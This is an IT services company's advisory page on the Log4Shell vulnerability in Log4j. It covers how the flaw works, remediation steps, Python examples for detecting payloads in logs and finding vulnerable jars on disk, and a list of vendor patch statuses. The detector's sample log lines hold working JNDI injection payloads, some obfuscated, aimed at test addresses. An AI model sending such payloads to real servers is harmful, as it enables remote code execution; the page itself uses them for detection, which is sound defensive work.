Log4j Vulnerability Update

log4j Zeroday Vulnerability
Network Center, Inc.


What is log4j?

The log4j security vulnerability, tracked as CVE-2021-44228, is one of the most widespread cybersecurity threats in recent years. It affects enterprise software and custom applications alike, and the library is a component of many cloud computing services. In short, it's a really big deal.

Log4j is a Java-based logging library, maintained by the Apache Software Foundation, that thousands of websites and applications use for functions most people never see: recording events for developers, debugging, and auditing. Nearly every application needs this kind of logging, so Log4j is everywhere, bundled inside commercial products as well as in-house code. It has been downloaded millions of times and is one of the most widely used logging components in corporate environments.

Jen Easterly, CISA Director
“[This vulnerability] is one of the most serious I’ve seen in my entire career, if not the most serious. We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage.” 

How does the vulnerability work?

Log4j 2 supports "lookups": when the text being logged contains a pattern such as ${jndi:ldap://host/path}, the library resolves it by contacting that host through Java's JNDI interface. An attacker who can get such a string into any field that ends up in a log (a username, a User-Agent header, a chat message, a search query) can point the lookup at a server they control, which answers with a reference to Java code that the vulnerable server then downloads and runs. The vulnerability has been named Log4Shell. If exploited, an attacker can make the server that is running log4j run any software they want, including software that takes over that server (known as a Remote Code Execution attack). Newer Java runtimes block the simplest remote-class-loading path by default, but attackers have other payloads that work through the same lookup, so no Java version should be treated as safe on its own. In short, cybercriminals have the ability to take over thousands of websites and online applications.
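The point that matters for detection is that Log4j evaluates nested lookups before the JNDI lookup ever sees the string, so attackers hid "jndi" behind forms such as ${${lower:j}ndi:...}, ${${::-j}ndi:...} and URL encoding, all of which defeat a plain search for the word. The following added example (written for this page, not code from NCI or from the Log4j project) mimics that evaluation on a few constructed access-log lines and then looks for the collapsed ${jndi:scheme://host...} form; the sample lines and the RFC 5737 test addresses in them are made up for the demonstration.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in logged data, including
the obfuscated forms attackers used to slip past simple "jndi" greps.
Added example for this page; it is not code from NCI or from Log4j."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting after normalisation: ${jndi:<scheme>://<host>...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*://\s*([^/:}\s]+)", re.I)


def _resolve(inner):
    """Return the literal text a simple lookup evaluates to, or None.
    Log4j 2 evaluates these before the JNDI lookup sees the string, so
    ${${lower:j}ndi:...}, ${${::-j}ndi:...} and ${${env:X:-j}ndi:...}
    all become ${jndi:...} on the vulnerable server."""
    key = inner.lower()
    if key.startswith("jndi:"):
        return None                      # keep it; this is the hit
    if key.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if key.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:                    # ${env:UNSET:-j}, ${sys:x:-j}, ${::-j}
        return inner.split(":-", 1)[1]   # default value of an unresolvable name
    return None                          # ${date:...} etc.: leave untouched


def _substitute(match):
    literal = _resolve(match.group(1))
    return match.group(0) if literal is None else literal


def normalize(text, max_rounds=32):
    """Repeatedly collapse inner lookups, innermost first, until stable."""
    for _ in range(max_rounds):
        collapsed = LOOKUP.sub(_substitute, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_line(raw):
    """Return a finding dict for one log line, or None if it looks clean."""
    norm = normalize(unquote(raw))       # undo %24%7B-style URL encoding first
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2),
            "normalized": norm, "obfuscated": norm != raw}


def scan(lines):
    """(index, finding) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((i, finding))
    return hits


# Constructed sample access-log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/o}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-d}ns://203.0.113.4/r}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 400 "curl/7.79"',
    '10.0.0.4 - - "GET /?q=${date:yyyy} HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG):
        print(f"line {i}: {f['scheme']}://{f['host']} obfuscated={f['obfuscated']}")
```

Run against real logs, the same normalisation should be applied to every field an application might log (headers, query strings, form bodies, usernames), not just the User-Agent, and the host extracted from each hit is the callback address to block and to search for in outbound DNS and LDAP/RMI connection records.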

What and Who's at Risk? 

In short, any internet-connected device, in both IT and Operational Technology (OT) environments, may be running Apache log4j and is therefore at risk. Early reports counted only a few hundred detected exploitation attempts; that is no longer the case, and newer data shows thousands of attempts every second. Addressing this vulnerability will be a challenge for most organizations and will take months, if not years, to secure all of the devices likely affected.

What Action Should you Take? 

Log4j is usually embedded deep inside other software, so it is hard to know whether it is present on a system at all, let alone which version. Cybersecurity experts are urging organizations to take action.

Businesses should ensure their IT provider or system administrators are following a process that involves:

  1. Checking software vendors' websites for notifications about each product in use
  2. Locating every vulnerable copy of the library via an automated script or scan, including copies bundled inside application archives, since a product can ship its own log4j separately from any system-wide install
  3. Scheduling a maintenance period to patch or mitigate the vulnerability; where a vendor patch is not yet available, apply the vendor's interim mitigation (for self-managed Log4j 2, Apache's guidance is to remove the JndiLookup class from log4j-core), then rescan after patching to confirm no vulnerable copies remain

A good first step is conducting a Log4j vulnerability scan of both external and internal networks. The scan reports provide a list of affected applications and help build a remediation roadmap where one is needed.
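A network scan finds hosts that respond to a test payload; it does not find the library itself. The host-side half of step 2 is a filesystem sweep for log4j-core, including copies nested inside WAR, EAR and fat JAR files. The added example below (written for this page; it is neither NCI's scanner nor Apache tooling) does that sweep, reads the version from the jar's Maven pom.properties or its filename, checks whether the JndiLookup class is still present, and rates each copy against the fix versions Apache published. The small archive tree that demo() builds in a temporary directory is a constructed fixture containing only the entries the scanner inspects.

```python
"""Locate Log4j 2 on disk (including copies nested inside WAR/EAR/fat JARs)
and rate each copy against CVE-2021-44228.  Added illustration for this
page; it is not NCI's scanner nor Apache's tooling.  The archive layout
built by demo() is a constructed fixture, not real product files."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FILENAME_VER = re.compile(r"log4j-core-(\d+(?:\.\d+)+)")


def _version_tuple(version):
    # "2.14.1" -> (2, 14, 1); "2.0-beta9" -> (2, 0, 9), which still sorts as old
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def assess(version, jndi_lookup_present):
    """Verdict for one log4j-core copy.
    2.17.1+ (Java 8), 2.12.4+ (Java 7) and 2.3.2+ (Java 6) carry the last of
    the Log4Shell-series fixes; 2.15.0, 2.16.0 and 2.17.0 closed CVE-2021-44228
    but still need an update for the follow-on CVEs; anything older is exposed
    unless JndiLookup.class was deleted, the mitigation Apache documented."""
    if version is None:
        return "unknown-version"
    v = _version_tuple(version)
    if v[0] != 2:
        return "not-log4j2"            # Log4j 1.x is not affected by CVE-2021-44228
    if v >= (2, 17, 1) or (2, 12, 4) <= v < (2, 13, 0) or (2, 3, 2) <= v < (2, 4, 0):
        return "patched"
    if not jndi_lookup_present:
        return "mitigated-jndilookup-removed"
    if v >= (2, 15, 0):
        return "partially-patched-update"
    return "vulnerable"


def _inspect_archive(zf, label, findings):
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names or FILENAME_VER.search(label):
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:
            m = FILENAME_VER.search(label)
            version = m.group(1) if m else None
        findings.append({"path": label, "version": version,
                         "jndi_lookup": JNDI_CLASS in names,
                         "verdict": assess(version, JNDI_CLASS in names)})
    # Recurse into bundled archives (WEB-INF/lib/*.jar, shaded jars, ...).
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _inspect_archive(inner, f"{label}!{name}", findings)


def scan_tree(root):
    """Walk root and return one finding per log4j-core copy discovered."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fn)
            label = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with zipfile.ZipFile(full) as zf:
                    _inspect_archive(zf, label, findings)
            except zipfile.BadZipFile:
                continue
    return sorted(findings, key=lambda f: f["path"])


def _fake_log4j_core(version, keep_jndi_class=True):
    """Constructed stand-in for log4j-core-<version>.jar holding only the two
    entries the scanner looks at (no real classes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if keep_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buf.getvalue()


def demo():
    """Build a small constructed tree in a temp dir, scan it, return {path: verdict}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.17.1"))                 # patched, loose on disk
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar",
                     _fake_log4j_core("2.14.1"))            # vulnerable, inside a WAR
    with zipfile.ZipFile(os.path.join(root, "legacy.jar"), "w") as jar:
        jar.writestr("log4j-core-2.14.1.jar",
                     _fake_log4j_core("2.14.1", keep_jndi_class=False))  # class deleted
    return {f["path"]: f["verdict"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:32s} {path}")
```

On a real host, point scan_tree at / (or at the application directories and the locations where vendors unpack their bundled JVMs) and treat "unknown-version" hits as findings to investigate by hand; they are typically shaded jars that carry the JndiLookup class without Maven metadata. The verdict table only covers the Log4j 2 line; a "not-log4j2" result for 1.x is not a clean bill of health, since 1.x is end-of-life and has separate issues, it just means CVE-2021-44228 does not apply.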

RESOURCES: 

If your organization needs assistance, our team at NCI has created log4j specific vulnerability scans and can help with remediation needs uncovered from the scan reports. 

Given the complexity of this situation, we recommend reviewing the comprehensive list maintained by the Cybersecurity and Infrastructure Security Agency for current, vendor-by-vendor statements on affected software.

NCI Core Services Updates:

Updated 2/03/2022

  • 3CX - Not Affected
  • Amazon - All products have been remediated 
  • Arctic Wolf - Not Affected 
  • AvePoint - Not Affected 
  • Bomgar / BeyondTrust -  Not Affected 
  • Canon -  Not Affected. More information found here - canon.com/support
  • Cisco -  Cisco has confirmed several affected products and is still investigating which additional products may be affected by these vulnerabilities. The following link will be updated with information about affected products and available patches:
  • Citrix - 2 Products Affected. For further details and patching information, visit Citrix Security Advisory resource page 
    • Endpoint Management (XenMobile Server) 
    • Citrix Virtual Apps and Desktops (XenApp & XenDesktop), Linux VDA (non-LTSR versions only)
  • ConnectWise – Not Affected
  • Datto – Not Affected
  • Dell – The following links provide details of Dell products that have been confirmed as impacted by the Log4j vulnerability. For additional details, visit Dell Response to Apache Log4j Remote Code Execution Vulnerability
  • ESET – Not Affected
  • Fortinet – Certain Fortinet products have been confirmed as affected by the Log4j vulnerabilities. For a full list of affected and nonaffected products along with available fixes, follow this link 
  • Graylog – All versions have been fixed. Follow this link for more information on versions and recommendations. 
  • Github – Mitigation instructions posted December 14th. Click here for more information from GitHub
  • Hewlett Packard Enterprise – Several products have been confirmed affected. Click here for a comprehensive list of known product vulnerabilities. More information available here- Hewlett Packard Enterprise Product Security Vulnerability Alerts 
  • IGEL – IGEL Universal Management Suite (UMS), all versions since 5.09.100, confirmed affected by the vulnerabilities. The recommended course of action is to update to the fixed version. For more information, visit ISN 2021-11:UMS Log4j Vulnerability
  • IT Glue / Kaseya – Not affected 
  • IX Systems – Not affected 
  • Jamf – Mitigated and patched. Additional Details can be found here -community.jamf.com
  • Liongard - Investigating. No direct risks identified. For more information visit liongard.com/faq-apache-log4j-vulnerability
  • Manage Engine – ADManager Plus has identified mitigation steps, click here for more information
  • Netapp – Several products are affected by the vulnerabilities. For a full list and remediation recommendations, follow this link: security.netapp.com/advisory
  • Nutanix – Currently no products affected 
  • Palo Alto – Not affected 
  • Pure Storage – Still under investigation. Known risks to several products associated with Log4Shell, CVE-2021-44228. Additional details and mitigation steps available
  • SolarWinds – Server & Application Monitor (SAM) affected, Database Performance Analyzer (DPA) affected. More details and recommendations can be found here - support.solarwinds.com
  • Sonicwall – Email Security is affected. NSM and analytics are still being investigated. For more information - sonicwall.com/vuln-detail
  • Tintri – Not affected 
  • Ubiquiti – Affected. Follow guidance in the following link: community.ui.com/releases/UniFi-Network-Application
  • Veeam – Not affected 
  • VMware – Products known to be affected as well as patching information and workarounds are listed in the VMware advisory
  • WatchGuard – Not Affected 
  • Zerto – Not Affected


Video Resources: 

Live Q&A